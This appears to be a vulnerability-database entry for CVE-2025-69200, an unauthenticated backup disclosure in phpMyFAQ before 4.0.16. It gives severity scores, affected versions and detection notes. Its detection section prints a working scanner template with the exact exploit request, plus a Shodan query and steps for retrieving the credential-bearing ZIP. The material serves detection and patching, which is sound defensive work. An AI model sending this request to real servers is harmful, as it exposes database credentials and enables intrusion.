cbcvebase.
CVE-2025-69200
published 2025-12-29

CVE-2025-69200: phpMyFAQ is an open source FAQ web application. In versions prior to 4.0.16, an unauthenticated remote attacker can trigger generation of a configuration…

PriorityP181high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
2.00%
78.4th percentile
phpMyFAQ is an open source FAQ web application. In versions prior to 4.0.16, an unauthenticated remote attacker can trigger generation of a configuration backup ZIP via `POST /api/setup/backup` and then download the generated ZIP from a web-accessible location. The ZIP contains sensitive configuration files (e.g., `database.php` with database credentials), leading to high-impact information disclosure and potential follow-on compromise. Version 4.0.16 fixes the issue.

Affected

5 ranges
VendorProductVersion rangeFixed in
phpmyfaqphpmyfaq< 4.0.164.0.16
phpmyfaqphpmyfaq
thorstenphpmyfaq< 4.0.164.0.16
thorstenphpmyfaq>= 0 < 4.0.164.0.16
thorstenphpmyfaq4.1.0-alpha – 4.1.0-beta.2

Detection & IOCsextracted from sources · hover to see the quote

urlPOST /api/setup/backup
filenamedatabase.php
sigma
id: CVE-2025-69200
info:
  name: phpMyFAQ - Configuration Backup Disclosure
  author: Louay-075
  severity: high
http:
- raw:
  - |
    POST /api/setup/backup HTTP/1.1
    Host: {{Hostname}}
    Content-Type: text/plain

    4.1.0-RC
  matchers-condition: and
  matchers:
  - type: word
    part: body
    words:
    - '"backupFile":"'
    - '.zip'
    condition: and
  - type: word
    words:
    - "error"
    - "forbidden"
    negative: true
  - type: word
    part: content_type
    words:
    - application/json
  • Detect unauthenticated POST requests to /api/setup/backup; a JSON response containing 'backupFile' and '.zip' indicates successful backup generation.
  • The exploit sends a plain-text body of '4.1.0-RC' with Content-Type: text/plain to POST /api/setup/backup with no authentication headers.
  • Use Shodan query 'http.title:"phpMyFAQ"' to identify exposed phpMyFAQ instances for proactive scanning.
  • The generated backup ZIP is placed in a web-accessible location and can be downloaded directly; monitor for .zip file downloads from the phpMyFAQ web root.
  • Extract the backup file URL from the JSON response field '.backupFile' to locate the downloadable ZIP containing database.php credentials.
  • ·The vulnerability affects phpMyFAQ versions prior to 4.0.16; the Nuclei template description incorrectly states '<= 4.0.16' but the fix is included in 4.0.16.
  • ·No authentication is required to exploit this endpoint; network-level controls blocking unauthenticated access to /api/setup/backup are a viable mitigation until patching.

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.